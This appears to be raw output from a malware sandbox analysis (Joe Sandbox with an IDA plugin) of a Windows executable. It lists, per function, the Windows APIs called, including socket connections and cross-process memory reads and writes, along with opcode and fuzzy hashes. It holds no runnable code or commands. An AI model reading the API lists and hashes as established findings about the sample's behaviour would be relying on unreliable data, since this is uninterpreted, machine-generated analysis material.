                                                                            • String ID:
                                                                            • API String ID: 4210589936-0
                                                                            • Opcode ID: 82e61e170eecd4210124c46bacbfcb15f1dc84b95dd43ef2a1ead00c1abbad67
                                                                            • Instruction ID: e6a8ebd99ad38caac911080f781d9a4bc5e7bbe6d58644376e42da3d2aea4287
                                                                            • Opcode Fuzzy Hash: 82e61e170eecd4210124c46bacbfcb15f1dc84b95dd43ef2a1ead00c1abbad67
                                                                            • Instruction Fuzzy Hash: 31416035604219FBCF2A9F64C844AE9FB74BF19324F10835AF82996290C735AD94DF91
                                                                            APIs
                                                                            • GetWindowRect.USER32(?,?), ref: 0033B369
                                                                            • PostMessageW.USER32(?,00000201,00000001), ref: 0033B413
                                                                            • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 0033B41B
                                                                            • PostMessageW.USER32(?,00000202,00000000), ref: 0033B429
                                                                            • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 0033B431
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: MessagePostSleep$RectWindow
                                                                            • String ID:
                                                                            • API String ID: 3382505437-0
                                                                            APIs
                                                                            • IsWindowVisible.USER32(?), ref: 0033DBD7
                                                                            • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 0033DBF4
                                                                            • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 0033DC2C
                                                                            • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 0033DC52
                                                                            • _wcsstr.LIBCMT ref: 0033DC5C
                                                                            Similarity
                                                                            • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                                                                            • String ID:
                                                                            • API String ID: 3902887630-0
                                                                            APIs
                                                                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0033BC90
                                                                            • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 0033BCC2
                                                                            • __itow.LIBCMT ref: 0033BCDA
                                                                            • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 0033BD00
                                                                            • __itow.LIBCMT ref: 0033BD11
                                                                            Similarity
                                                                            • API ID: MessageSend$__itow
                                                                            • String ID:
                                                                            • API String ID: 3379773720-0
                                                                            APIs
                                                                              • Part of subcall function 003050E6: _wcsncpy.LIBCMT ref: 003050FA
                                                                            • GetFileAttributesW.KERNEL32(?,?,?,?,003460C3), ref: 00346369
                                                                            • GetLastError.KERNEL32(?,?,?,003460C3), ref: 00346374
                                                                            • CreateDirectoryW.KERNEL32(?,00000000,?,?,?,003460C3), ref: 00346388
                                                                            • _wcsrchr.LIBCMT ref: 003463AA
                                                                              • Part of subcall function 00346318: CreateDirectoryW.KERNEL32(?,00000000,?,?,?,003460C3), ref: 003463E0
                                                                            Similarity
                                                                            • API ID: CreateDirectory$AttributesErrorFileLast_wcsncpy_wcsrchr
                                                                            • String ID:
                                                                            • API String ID: 3633006590-0
                                                                            APIs
                                                                              • Part of subcall function 0035A82C: inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 0035A84E
                                                                            • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00358BD3
                                                                            • WSAGetLastError.WSOCK32(00000000), ref: 00358BE2
                                                                            • connect.WSOCK32(00000000,?,00000010), ref: 00358BFE
                                                                            Similarity
                                                                            • API ID: ErrorLastconnectinet_addrsocket
                                                                            • String ID:
                                                                            • API String ID: 3701255441-0
                                                                            APIs
                                                                            • IsWindow.USER32(00000000), ref: 00358441
                                                                            • GetForegroundWindow.USER32 ref: 00358458
                                                                            • GetDC.USER32(00000000), ref: 00358494
                                                                            • GetPixel.GDI32(00000000,?,00000003), ref: 003584A0
                                                                            • ReleaseDC.USER32(00000000,00000003), ref: 003584DB
                                                                            Similarity
                                                                            • API ID: Window$ForegroundPixelRelease
                                                                            • String ID:
                                                                            • API String ID: 4156661090-0
                                                                            APIs
                                                                            • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 0031AFE3
                                                                            • SelectObject.GDI32(?,00000000), ref: 0031AFF2
                                                                            • BeginPath.GDI32(?), ref: 0031B009
                                                                            • SelectObject.GDI32(?,00000000), ref: 0031B033
                                                                            Similarity
                                                                            • API ID: ObjectSelect$BeginCreatePath
                                                                            • String ID:
                                                                            • API String ID: 3225163088-0
                                                                            APIs
                                                                            • __calloc_crt.LIBCMT ref: 003221A9
                                                                            • CreateThread.KERNEL32(?,?,003222DF,00000000,?,?), ref: 003221ED
                                                                            • GetLastError.KERNEL32 ref: 003221F7
                                                                            • _free.LIBCMT ref: 00322200
                                                                            • __dosmaperr.LIBCMT ref: 0032220B
                                                                              • Part of subcall function 00327C0E: __getptd_noexit.LIBCMT ref: 00327C0E
                                                                            Similarity
                                                                            • API ID: CreateErrorLastThread__calloc_crt__dosmaperr__getptd_noexit_free
                                                                            • String ID:
                                                                            • API String ID: 2664167353-0
                                                                            APIs
                                                                            • GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 0033ABD7
                                                                            • GetLastError.KERNEL32(?,0033A69F,?,?,?), ref: 0033ABE1
                                                                            • GetProcessHeap.KERNEL32(00000008,?,?,0033A69F,?,?,?), ref: 0033ABF0
                                                                            • HeapAlloc.KERNEL32(00000000,?,0033A69F,?,?,?), ref: 0033ABF7
                                                                            • GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 0033AC0E
                                                                            Similarity
                                                                            • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                                            • String ID:
                                                                            • API String ID: 842720411-0
                                                                            APIs
                                                                            • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00347A74
                                                                            • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00347A82
                                                                            • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00347A8A
                                                                            • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00347A94
                                                                            • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00347AD0
                                                                            Similarity
                                                                            • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                            • String ID:
                                                                            • API String ID: 2833360925-0
                                                                            APIs
                                                                            • CLSIDFromProgID.OLE32 ref: 00339ADC
                                                                            • ProgIDFromCLSID.OLE32(?,00000000), ref: 00339AF7
                                                                            • lstrcmpiW.KERNEL32(?,00000000), ref: 00339B05
                                                                            • CoTaskMemFree.OLE32(00000000,?,00000000), ref: 00339B15
                                                                            • CLSIDFromString.OLE32(?,?), ref: 00339B21
Similarity
• API ID: From$Prog$FreeStringTasklstrcmpi
• String ID:
• API String ID: 3897988419-0
APIs
• GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 0033AA79
• GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 0033AA83
• GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 0033AA92
• HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 0033AA99
• GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 0033AAAF
Similarity
• API ID: HeapInformationToken$AllocErrorLastProcess
• String ID:
• API String ID: 44706859-0
APIs
• GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 0033AADA
• GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 0033AAE4
• GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0033AAF3
• HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 0033AAFA
• GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0033AB10
Similarity
• API ID: HeapInformationToken$AllocErrorLastProcess
• String ID:
• API String ID: 44706859-0
APIs
• GetDlgItem.USER32(?,000003E9), ref: 0033EC94
• GetWindowTextW.USER32(00000000,?,00000100), ref: 0033ECAB
• MessageBeep.USER32(00000000), ref: 0033ECC3
• KillTimer.USER32(?,0000040A), ref: 0033ECDF
• EndDialog.USER32(?,00000001), ref: 0033ECF9
Similarity
• API ID: BeepDialogItemKillMessageTextTimerWindow
• String ID:
• API String ID: 3741023627-0
APIs
• EndPath.GDI32(?), ref: 0031B0BA
• StrokeAndFillPath.GDI32(?,?,0037E680,00000000,?,?,?), ref: 0031B0D6
• SelectObject.GDI32(?,00000000), ref: 0031B0E9
• DeleteObject.GDI32 ref: 0031B0FC
• StrokePath.GDI32(?), ref: 0031B117
Similarity
• API ID: Path$ObjectStroke$DeleteFillSelect
• String ID:
• API String ID: 2625713937-0
APIs
• CoInitialize.OLE32(00000000), ref: 0034F2DA
• CoCreateInstance.OLE32(0038DA7C,00000000,00000001,0038D8EC,?), ref: 0034F2F2
• CoUninitialize.OLE32 ref: 0034F555
Strings
Similarity
• API ID: CreateInitializeInstanceUninitialize
• String ID: .lnk
• API String ID: 948891078-24824748
APIs
  • Part of subcall function 0030660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,003053B1,?,?,003061FF,?,00000000,00000001,00000000), ref: 0030662F
• CoInitialize.OLE32(00000000), ref: 0034E85D
• CoCreateInstance.OLE32(0038DA7C,00000000,00000001,0038D8EC,?), ref: 0034E876
• CoUninitialize.OLE32 ref: 0034E893
  • Part of subcall function 0030936C: __swprintf.LIBCMT ref: 003093AB
  • Part of subcall function 0030936C: __itow.LIBCMT ref: 003093DF
Strings
Similarity
• API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
• String ID: .lnk
• API String ID: 2126378814-24824748
APIs
• __startOneArgErrorHandling.LIBCMT ref: 003232ED
  • Part of subcall function 0032E0D0: __87except.LIBCMT ref: 0032E10B
Strings
Similarity
• API ID: ErrorHandling__87except__start
• String ID: pow
• API String ID: 2905807303-2276729525
APIs
• CharUpperBuffW.USER32(0000000C,00000016,00000016,00000000,00000000,?,00000000,0039DC50,?,0000000F,0000000C,00000016,0039DC50,?), ref: 00344645
  • Part of subcall function 0030936C: __swprintf.LIBCMT ref: 003093AB
  • Part of subcall function 0030936C: __itow.LIBCMT ref: 003093DF
• CharUpperBuffW.USER32(?,?,00000000,?), ref: 003446C5
Strings
Similarity
• API ID: BuffCharUpper$__itow__swprintf
• String ID: REMOVE$THIS
• API String ID: 3797816924-776492005
APIs
  • Part of subcall function 0034430B: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,0033BC08,?,?,00000034,00000800,?,00000034), ref: 00344335
• SendMessageW.USER32(?,00001104,00000000,00000000), ref: 0033C1D3
  • Part of subcall function 003442D6: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,0033BC37,?,?,00000800,?,00001073,00000000,?,?), ref: 00344300
  • Part of subcall function 0034422F: GetWindowThreadProcessId.USER32(?,?), ref: 0034425A
  • Part of subcall function 0034422F: OpenProcess.KERNEL32(00000438,00000000,?,?,?,0033BBCC,00000034,?,?,00001004,00000000,00000000), ref: 0034426A
  • Part of subcall function 0034422F: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,0033BBCC,00000034,?,?,00001004,00000000,00000000), ref: 00344280
• SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0033C240
• SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0033C28D
Strings
Similarity
• API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
• String ID: @
• API String ID: 4150878124-2766056989
                                                                            APIs
                                                                            • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,0039DC00,00000000,?,?,?,?), ref: 0036A6D8
                                                                            • GetWindowLongW.USER32 ref: 0036A6F5
                                                                            • SetWindowLongW.USER32(?,000000F0,00000000), ref: 0036A705
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            Similarity
                                                                            • API ID: Window$Long
                                                                            • String ID: SysTreeView32
                                                                            • API String ID: 847901565-1698111956
                                                                            • Opcode ID: 3120e6ce25efcceaa5959f7ffc7e0d05760e3ac566948cf4b4c72253f4c71303
                                                                            • Instruction ID: a17be715686448c73c668d2182425394ac932f56843e173ded10c7e71ea13c9d
                                                                            • Opcode Fuzzy Hash: 3120e6ce25efcceaa5959f7ffc7e0d05760e3ac566948cf4b4c72253f4c71303
                                                                            • Instruction Fuzzy Hash: A9319031200605ABDB128E74CC41BEA77A9EF49324F258715F875A31E5D770E8609B50
                                                                            APIs
                                                                            • _memset.LIBCMT ref: 00355190
                                                                            • InternetCrackUrlW.WININET(?,00000000,00000000,?), ref: 003551C6
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            Similarity
                                                                            • API ID: CrackInternet_memset
                                                                            • String ID: |$D5
                                                                            • API String ID: 1413715105-3391885218
                                                                            • Opcode ID: 3e482c5b9594f2d49441c40668c8b97d25d4847607357695c60da2e6ff905b46
                                                                            • Instruction ID: 606a4c3996afd9450aac51a8a2867c770e5b0be040cd6e9c1ef568403dc7ca89
                                                                            • Opcode Fuzzy Hash: 3e482c5b9594f2d49441c40668c8b97d25d4847607357695c60da2e6ff905b46
                                                                            • Instruction Fuzzy Hash: FB311971811119ABCF02AFE4CD95EEE7FB9FF14700F000115F815AA166DB31AA06CBA0
                                                                            APIs
                                                                            • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 0036A15E
                                                                            • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 0036A172
                                                                            • SendMessageW.USER32(?,00001002,00000000,?), ref: 0036A196
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            Similarity
                                                                            • API ID: MessageSend$Window
                                                                            • String ID: SysMonthCal32
                                                                            • API String ID: 2326795674-1439706946
                                                                            • Opcode ID: 004af0a08b5d85a867215086d3eeebf3f53259f11af3b8791a82d7dd8ec38b90
                                                                            • Instruction ID: 8f7644ecf47cfdb8889a3914b5b5387b9763a35084d23f2eb5155df359e73a0c
                                                                            • Opcode Fuzzy Hash: 004af0a08b5d85a867215086d3eeebf3f53259f11af3b8791a82d7dd8ec38b90
                                                                            • Instruction Fuzzy Hash: 1121BF32510218ABDF128F94CC42FEA3B79EF49714F114214FE55BB1D0D6B5AC50CBA0
                                                                            APIs
                                                                            • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 0036A941
                                                                            • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 0036A94F
                                                                            • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 0036A956
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            Similarity
                                                                            • API ID: MessageSend$DestroyWindow
                                                                            • String ID: msctls_updown32
                                                                            • API String ID: 4014797782-2298589950
                                                                            • Opcode ID: 44cb64b9d0f50a6e24a6aa7b8d6141f2edc5900e39b383da8993b2941e84dd29
                                                                            • Instruction ID: 299e10a5cff15ebd741bc96f2596f974df580f6903fe748f8907168efd87f005
                                                                            • Opcode Fuzzy Hash: 44cb64b9d0f50a6e24a6aa7b8d6141f2edc5900e39b383da8993b2941e84dd29
                                                                            • Instruction Fuzzy Hash: FC2192B5600609AFDB12DF18CC91DA737ADEF5A354F154059FA04AB3A2CB30EC119B61
                                                                            APIs
                                                                            • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00369A30
                                                                            • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00369A40
                                                                            • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00369A65
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            Similarity
                                                                            • API ID: MessageSend$MoveWindow
                                                                            • String ID: Listbox
                                                                            • API String ID: 3315199576-2633736733
                                                                            • Opcode ID: 5c1d4ea9065de6bf65d8dd6929adbeeae2e8f8ced06e81fc8dd946540328514b
                                                                            • Instruction ID: 14d0d190b6d4923d63266ba9efd70e1379e0db22b4dc19a419c4624b88085633
                                                                            • Opcode Fuzzy Hash: 5c1d4ea9065de6bf65d8dd6929adbeeae2e8f8ced06e81fc8dd946540328514b
                                                                            • Instruction Fuzzy Hash: 50218332610118BFDF168F54CC85FBB3BAEEF89764F118129F9549B194C6719C5187A0
                                                                            APIs
                                                                            • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 0036A46D
                                                                            • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 0036A482
                                                                            • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 0036A48F
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            Similarity
                                                                            • API ID: MessageSend
                                                                            • String ID: msctls_trackbar32
                                                                            • API String ID: 3850602802-1010561917
                                                                            • Opcode ID: 3cc3b339004ceaad65cd3814fa12680069fe8f267f8071916da95f861f87dc96
                                                                            • Instruction ID: e3cfdb81e1a70cf50f6fcde699f1cb8371a524ad5dc59b24608676e9ecc8f46a
                                                                            • Opcode Fuzzy Hash: 3cc3b339004ceaad65cd3814fa12680069fe8f267f8071916da95f861f87dc96
                                                                            • Instruction Fuzzy Hash: 1A11E771200208BEEF265F65CC46FEB3B6DEF89754F024118FB45A6191DAB2E811DB24
                                                                            APIs
                                                                            • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,00322350,?), ref: 003222A1
                                                                            • GetProcAddress.KERNEL32(00000000), ref: 003222A8
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            Similarity
                                                                            • API ID: AddressLibraryLoadProc
                                                                            • String ID: RoInitialize$combase.dll
                                                                            • API String ID: 2574300362-340411864
                                                                            • Opcode ID: 774ddc13093d0444474a876f3e0c2d0ad2ec830d814a990971d559ae4ca3fc6a
                                                                            • Instruction ID: 122f36bf97a01807a0ddb7523855ea5240295014dc093846bc73adf2127c348d
                                                                            • Opcode Fuzzy Hash: 774ddc13093d0444474a876f3e0c2d0ad2ec830d814a990971d559ae4ca3fc6a
                                                                            • Instruction Fuzzy Hash: 43E01A74A90740EBDB676F70EC8DF55376CAB00B06F104460F202D50E0CBB99040DF04
                                                                            APIs
                                                                            • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00322276), ref: 00322376
                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0032237D
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            Similarity
                                                                            • API ID: AddressLibraryLoadProc
                                                                            • String ID: RoUninitialize$combase.dll
                                                                            • API String ID: 2574300362-2819208100
                                                                            • Opcode ID: 9aabca3326a95b18fe1116921784baa271a437651553d1598ed19bfb19f98d10
                                                                            • Instruction ID: 7c92e946fd7555359f38939113bae47d72a92a4ccf221b78c1f5018271e1d4aa
                                                                            • Opcode Fuzzy Hash: 9aabca3326a95b18fe1116921784baa271a437651553d1598ed19bfb19f98d10
                                                                            • Instruction Fuzzy Hash: F5E09278544744EFDA27AFA1ED0DF457B6CBB00706F150454F20AD20F0CBB8A4009B14
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            Similarity
                                                                            • API ID: LocalTime__swprintf
                                                                            • String ID: %.3d$WIN_XPe
                                                                            • API String ID: 2070861257-2409531811
                                                                            • Opcode ID: f9bf2f5d32081984ef534c6aac24423f1a862dda7312d32c94e83e9496d8f7ad
                                                                            • Instruction ID: 0887a9e8d86a7de9af273025debbe7aeaab1836db6662856a3359cebc06814c1
                                                                            • Opcode Fuzzy Hash: f9bf2f5d32081984ef534c6aac24423f1a862dda7312d32c94e83e9496d8f7ad
                                                                            • Instruction Fuzzy Hash: B1E01271804A29FBCB279750DD05DFD73BCA788741F1044D2F90AE1804E7399B84AB17
                                                                            APIs
                                                                            • LoadLibraryA.KERNEL32(kernel32.dll,?,003621FB,?,003623EF), ref: 00362213
                                                                            • GetProcAddress.KERNEL32(00000000,GetProcessId), ref: 00362225
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            Similarity
                                                                            • API ID: AddressLibraryLoadProc
                                                                            • String ID: GetProcessId$kernel32.dll
                                                                            • API String ID: 2574300362-399901964
                                                                            • Opcode ID: fb8650e2f0348ea4a4de852ac57e7f8a57c4e9c671f8558e39b2f38f35ae9c84
                                                                            • Instruction ID: f4d1d0d1877ac1772bcc9f05caf0beed4bf44ccdc837712be1defb39e21989a1
                                                                            • Opcode Fuzzy Hash: fb8650e2f0348ea4a4de852ac57e7f8a57c4e9c671f8558e39b2f38f35ae9c84
                                                                            • Instruction Fuzzy Hash: 3ED0A734900B169FC7635F31F80C68377D8EF05704F02885AE842E2590D770D8808760
                                                                            APIs
                                                                            • LoadLibraryA.KERNEL32(kernel32.dll,00000000,003042EC,?,003042AA,?), ref: 00304304
                                                                            • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00304316
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            Similarity
                                                                            • API ID: AddressLibraryLoadProc
                                                                            • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                                            • API String ID: 2574300362-1355242751
                                                                            • Opcode ID: 008d722bccc2a1f4737c73f3ba3cbf438eea2318aba1e212af16598369f661d7
                                                                            • Instruction ID: 84d72c523bd8051cb7b060fa93ce1a12ca752b616adaacfa951da8c20dca2768
                                                                            • Opcode Fuzzy Hash: 008d722bccc2a1f4737c73f3ba3cbf438eea2318aba1e212af16598369f661d7
                                                                            • Instruction Fuzzy Hash: 9CD0A774804712AFC7635F25EC0C68277D8AF04705F014499E642D25F0D7B0C8808710
                                                                            APIs
                                                                            • LoadLibraryA.KERNEL32(kernel32.dll,003041BB,00304341,?,0030422F,?,003041BB,?,?,?,?,003039FE,?,00000001), ref: 00304359
                                                                            • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 0030436B
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: AddressLibraryLoadProc
                                                                            • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                                            • API String ID: 2574300362-3689287502
                                                                            • Opcode ID: b342289c930b2917044c107d34ed385ca14c18a03390a987990e6728ca3e1a9b
                                                                            • Instruction ID: 5823ab87ccbdc0f7c93c770216805e6e7ab3ec6e78b65a40070b5f8811a6ee8e
                                                                            • Opcode Fuzzy Hash: b342289c930b2917044c107d34ed385ca14c18a03390a987990e6728ca3e1a9b
                                                                            • Instruction Fuzzy Hash: 70D0A774800712AFC7335F31E80C68377D8AF10719F014599E582D25D0D7B0D8808B10
                                                                            APIs
                                                                            • LoadLibraryA.KERNEL32(oleaut32.dll,?,0034051D,?,003405FE), ref: 00340547
                                                                            • GetProcAddress.KERNEL32(00000000,RegisterTypeLibForUser), ref: 00340559
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: AddressLibraryLoadProc
                                                                            • String ID: RegisterTypeLibForUser$oleaut32.dll
                                                                            • API String ID: 2574300362-1071820185
                                                                            • Opcode ID: 6c2c15b1bb4b92873834c5705845d7545dccd9fae360ee38655cd5840653533b
                                                                            • Instruction ID: 4bdcdd415c0625cdaa1a05dd18b375e0d17cefd4056871f666f5aa3989ffdb1b
                                                                            • Opcode Fuzzy Hash: 6c2c15b1bb4b92873834c5705845d7545dccd9fae360ee38655cd5840653533b
                                                                            • Instruction Fuzzy Hash: C0D0A7305047129FC7229F21F80C69677E8EF01705F11C89DE54BD25A0D670D8808B10
                                                                            APIs
                                                                            • LoadLibraryA.KERNEL32(oleaut32.dll,00000000,0034052F,?,003406D7), ref: 00340572
                                                                            • GetProcAddress.KERNEL32(00000000,UnRegisterTypeLibForUser), ref: 00340584
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: AddressLibraryLoadProc
                                                                            • String ID: UnRegisterTypeLibForUser$oleaut32.dll
                                                                            • API String ID: 2574300362-1587604923
                                                                            • Opcode ID: 24b30c33d57cb2d368c6468c3448a723f00ffa73b6b9846c15c647382f4b08da
                                                                            • Instruction ID: a6ef2ea97cfc3639ff3fbca88d792004f1f6d962882002af192c360349d79fbb
                                                                            • Opcode Fuzzy Hash: 24b30c33d57cb2d368c6468c3448a723f00ffa73b6b9846c15c647382f4b08da
                                                                            • Instruction Fuzzy Hash: 88D0A7315047129FC7225F30E84CB9377E8EF05704F11869DEA42D2590D770D4C08B20
                                                                            APIs
                                                                            • LoadLibraryA.KERNEL32(kernel32.dll,?,0035ECBE,?,0035EBBB), ref: 0035ECD6
                                                                            • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0035ECE8
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmp
